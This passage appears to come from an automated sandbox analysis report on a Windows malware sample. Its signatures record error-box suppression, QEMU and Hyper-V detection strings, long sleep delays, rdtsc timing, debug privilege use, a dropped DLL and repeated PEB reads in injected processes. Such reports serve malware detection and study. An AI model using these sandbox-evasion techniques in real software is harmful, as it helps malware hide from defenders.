      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\qga\qga.exe
      Source: powershell.exe, 0000000D.00000002.1827582249.0000000009B61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: powershell.exe, 0000000D.00000002.1827582249.0000000009B61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=PROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLPROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
      Source: C:\Windows\explorer.exe TID: 3136Thread sleep time: -234000s >= -30000s
      Source: C:\Windows\SysWOW64\chkdsk.exe TID: 4528Thread sleep time: -176000s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.dllJump to dropped file
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F03CE40 rdtsc
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7904
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeAPI coverage: 1.2 %
      Source: C:\Windows\SysWOW64\chkdsk.exeAPI coverage: 2.7 %
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformation
      Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: ieinstal.exe, 0000001B.00000002.1969313540.000000000336E000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1702123686.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1969849452.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1964744060.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1701619808.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832573001.000000000F713000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2244636535.000000000F6FD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 0000000D.00000002.1827582249.0000000009B61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=ProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\iertutil.dllProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\iertutil.dll
      Source: powershell.exe, 0000000D.00000002.1827582249.0000000009B61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F03CE40 rdtsc
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess token adjusted: Debug
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F03FF03 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F03FF03 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F03FF03 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBCEF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBCEF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBCEF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBCEF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBCEF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBCEF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFF1EED mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFF1EED mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFF1EED mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F094F1D mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC2EE8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC2EE8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC2EE8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC2EE8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F000F16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F000F16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F000F16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F000F16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC3EE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFFBED0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F048F3C mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F048F3C mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F048F3C mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F048F3C mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFF2EB8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFF2EB8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F07BF4D mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD1EB2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD1EB2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD1EB2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD1EB2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F07AF50 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFFCEA0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F07EF66 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F016F70 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F094F7C mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEAE89 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEAE89 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEBE80 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC1E70 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFF7E71 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F048F8B mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F048F8B mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F048F8B mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFFCE70 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBBE60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBBE60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEEE48 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBFE40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBAE40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBAE40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBAE40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBDE45 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBDE45 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFFCE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC2E32 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F07EFD3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F03FFDC mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F03FFDC mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F03FFDC mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F03FFDC mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F03FFDC mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F03FFDC mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBBE18 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC3E14 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC3E14 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC3E14 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFF8E15 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F094FFF mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC6E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC6E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC6E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC6E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC3E01 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFE8FFB mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F094E03 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F03FE1F mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F03FE1F mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F03FE1F mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F03FE1F mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFB9FD0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F088E26 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F088E26 mov eax, dword ptr fs:[00000030h]
